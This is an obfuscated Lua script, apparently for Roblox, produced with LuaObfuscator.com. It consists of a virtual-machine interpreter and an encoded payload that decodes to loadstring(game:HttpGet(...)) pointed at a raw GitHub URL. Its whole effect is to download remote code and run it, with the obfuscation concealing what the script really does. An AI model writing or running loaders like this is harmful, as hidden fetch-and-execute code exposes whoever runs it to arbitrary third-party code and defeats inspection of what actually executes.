--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v69,v19);v19=nil;v96=1;end end else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=0;local v71;while true do if (v70==(0 -0)) then v71=(v31/((5 -(1640 -(1523 + 114)))^(v32-(1 -0))))%((4 -(2 -0))^(((v33-(620 -((1620 -(68 + 997)) + 58 + 6))) -(v32-(932 -(857 + (1344 -(226 + 1044)))))) + (569 -(367 + 201)))) ;return v71-(v71%(4 -3)) ;end end else local v72=((1046 -(32 + 85)) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v40 * (31011612 -14234396)) + (v39 * (120312 -54776)) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=351 -(87 + 263) ;local v44=(v20(v42,(623 -(416 + 26)) -(67 + 113) ,(47 -32) + 5 ) * ((4 -2)^(24 + 4 + 4))) + v41 ;local v45=v20(v42,(146 -63) -(500 -(145 + 293)) ,983 -(802 + 150) );local v46=((v20(v42,(515 -(44 + 386)) -53 )==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else local v76=1187 -((2555 -(998 + 488)) + 118) ;while true do if (v76==(0 -0)) then v45=1 -0 ;v43=0 + 0 ;break;end end end elseif (v45==((1156 + 2480) -1589)) then return ((v44==(0 + 0)) and (v46 * ((792 -(368 + 423))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1041 -(10 + 8)) ) * (v43 + (v44/((7 -5)^52))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(773 -(201 + 571)) );v18=v18 + v47 ;local v49={};for v66=1139 -(116 + 1022) , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=811 -(569 + 242) ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50~=(1 + 0)) then else v53=nil;v54=nil;v50=1 + 1 ;end if ((1 + 3)==v50) then while true do if (v51==(2 -1)) then v54=nil;v55=nil;v51=1 + 1 ;end if (v51~=3) then else v58=nil;while true do if (v52==(6 -4)) then local v102=0 -0 ;while true do if (v102==(375 -(123 + 251))) then return v56;end if (v102==(0 -0)) then local v124=0;while true do if (v124==(1272 -(945 + 326))) then v102=699 -(208 + 490) ;break;end if (v124==(0 + 0)) then for v160=1 + 0 ,v23() do local v161=0;local v162;local v163;local v164;while true do if (v161==(1 + 0)) then v164=nil;while true do if (v162==0) then local v173=0;while true do if (v173==0) then v163=836 -(660 + 176) ;v164=nil;v173=1;end if (v173~=(1087 -(461 + 625))) then else v162=1 + 0 ;break;end end end if (v162==(203 -(14 + 188))) then while true do if (v163==0) then v164=v21();if (v20(v164,1289 -(993 + 295) ,1 + 0 )~=(675 -(534 + 141))) then else local v174=1171 -(418 + 753) ;local v175;local v176;local v177;local v178;while true do if (v174~=(1 + 1)) then else while true do if (2==v175) then local v179=0 + 0 ;while true do if (v179==(0 + 0)) then if (v20(v177,1,1 + 0 )==1) then v178[2 + 0 ]=v58[v178[3 -1 ]];end if (v20(v177,2 -0 ,2)==1) then v178[1 + 2 ]=v58[v178[8 -5 ]];end v179=1 + 0 ;end if (v179~=(1 + 0)) then else v175=3;break;end end end if (v175==(2 + 1)) then if (v20(v177,1148 -(466 + 679) ,399 -(115 + 281) )==(2 -1)) then v178[1904 -(106 + 1794) ]=v58[v178[9 -5 ]];end v53[v160]=v178;break;end if (v175==(0 + 0)) then local v181=0 + 0 ;while true do if (v181==(2 -1)) then v175=115 -(4 + 110) ;break;end if ((0 -0)==v181) then v176=v20(v164,7 -5 ,1430 -(41 + 1386) );v177=v20(v164,871 -(550 + 317) ,8 -2 );v181=1 -0 ;end end end if (v175~=(2 -1)) then else v178={v22(),v22(),nil,nil};if (v176==(1990 -(582 + 1408))) then local v184=0 -0 ;local v185;while true do if (v184~=(166 -(122 + 44))) then else v185=0 -0 ;while true do if (v185==(0 -0)) then v178[11 -8 ]=v22();v178[1828 -(1195 + 629) ]=v22();break;end end break;end end elseif (v176==(1 -0)) then v178[1 + 2 ]=v23();elseif (v176==(243 -(187 + 54))) then v178[5 -2 ]=v23() -((782 -(162 + 618))^16) ;elseif (v176==(68 -(30 + 35))) then local v194=0 + 0 ;local v195;while true do if (v194~=(1257 -(1043 + 214))) then else v195=0 + 0 ;while true do if (v195==0) then v178[1215 -(323 + 889) ]=v23() -((2 + 0)^(596 -(361 + 219))) ;v178[324 -(53 + 267) ]=v22();break;end end break;end end end v175=3 -1 ;end end break;end if (v174~=(1 + 0)) then else v177=nil;v178=nil;v174=2 -0 ;end if (v174==(0 + 0)) then v175=982 -(18 + 964) ;v176=nil;v174=1;end end end break;end end break;end end break;end if (v161==(0 -0)) then v162=0;v163=nil;v161=1 + 0 ;end end end for v165=1637 -(1373 + 263) ,v23() do v54[v165-(1 + 0) ]=v28();end v124=1001 -(451 + 549) ;end end end end end if (v52~=1) then else local v103=850 -(20 + 830) ;local v104;while true do if (v103==(0 + 0)) then v104=0 + 0 ;while true do if (v104==0) then local v153=126 -(116 + 10) ;while true do if (v153==(1 + 0)) then v104=1;break;end if (v153~=0) then else v57=v23();v58={};v153=739 -(542 + 196) ;end end end if (v104==(1 -0)) then for v167=1 -0 ,v57 do local v168=1384 -(746 + 638) ;local v169;local v170;while true do if ((0 + 0)==v168) then local v171=0 -0 ;while true do if (v171~=(342 -(218 + 123))) then else v168=1;break;end if (v171~=(0 + 0)) then else v169=v21();v170=nil;v171=1;end end end if (v168==(1582 -(1535 + 46))) then if (v169==(1 + 0)) then v170=v21()~=(0 -0) ;elseif (v169==(4 -2)) then v170=v24();elseif (v169~=(3 + 0)) then else v170=v25();end v58[v167]=v170;break;end end end v56[408 -(118 + 287) ]=v21();v104=7 -5 ;end if (2==v104) then v52=1 + 1 ;break;end end break;end end end if (v52==(560 -(306 + 254))) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1 -0 ;end end break;end if (v51~=(979 -(553 + 424))) then else local v94=0;while true do if (v94~=(1 -0)) then else v51=3;break;end if (v94==0) then v56=nil;v57=nil;v94=1468 -(899 + 568) ;end end end if (v51~=(0 + 0)) then else local v95=0 + 0 ;while true do if ((1 + 0)~=v95) then else v51=2 -1 ;break;end if (v95~=(0 + 0)) then else v52=603 -(268 + 335) ;v53=nil;v95=2 -1 ;end end end end break;end if (v50==(293 -(60 + 230))) then v57=nil;v58=nil;v50=8 -4 ;end if (v50==(572 -(426 + 146))) then v51=0 + 0 ;v52=nil;v50=1 + 0 ;end if (v50==(1458 -(282 + 1174))) then v55=nil;v56=nil;v50=3;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v77=v63;local v78=v64;local v79=v65;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=3) then if (v90<=1) then if (v90>0) then v87[v89[2]]=v61[v89[3]];else v87[v89[2]]();end elseif (v90>2) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v89[2];v109=v87[v89[3]];v107=1;end if (v107==1) then v87[v108 + 1 ]=v109;v87[v108]=v109[v89[4]];break;end end else local v110=0;local v111;local v112;local v113;local v114;local v115;while true do if (v110==3) then v87[v115 + 1 ]=v114;v87[v115]=v114[v89[4]];v81=v81 + 1 ;v89=v77[v81];v110=4;end if (4==v110) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v115=v89[2];v110=5;end if (5==v110) then v112,v113=v80(v87[v115](v13(v87,v115 + 1 ,v89[3])));v82=(v113 + v115) -1 ;v111=0;for v155=v115,v82 do v111=v111 + 1 ;v87[v155]=v112[v111];end v110=6;end if (v110==6) then v81=v81 + 1 ;v89=v77[v81];v115=v89[2];v87[v115]=v87[v115](v13(v87,v115 + 1 ,v82));v110=7;end if (v110==2) then v81=v81 + 1 ;v89=v77[v81];v115=v89[2];v114=v87[v89[3]];v110=3;end if (v110==1) then v87[v89[2]]=v61[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v61[v89[3]];v110=2;end if (v110==8) then v89=v77[v81];do return;end break;end if (v110==0) then v111=nil;v112,v113=nil;v114=nil;v115=nil;v110=1;end if (v110==7) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v110=8;end end end elseif (v90<=5) then if (v90==4) then do return;end else local v116=0;local v117;while true do if (v116==0) then v117=v89[2];v87[v117]=v87[v117](v13(v87,v117 + 1 ,v82));break;end end end elseif (v90>6) then local v118=v89[2];local v119,v120=v80(v87[v118](v13(v87,v118 + 1 ,v89[3])));v82=(v120 + v118) -1 ;local v121=0;for v125=v118,v82 do local v126=0;while true do if (v126==0) then v121=v121 + 1 ;v87[v125]=v119[v121];break;end end end else v87[v89[2]]=v89[3];end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403573O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5368736E7A686A7A6D7A79616A79616D7A6D2F2D536D6974652D2F6D61696E2F68692O6C626F7442724565413O6B4B6F743O6800083O0012023O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
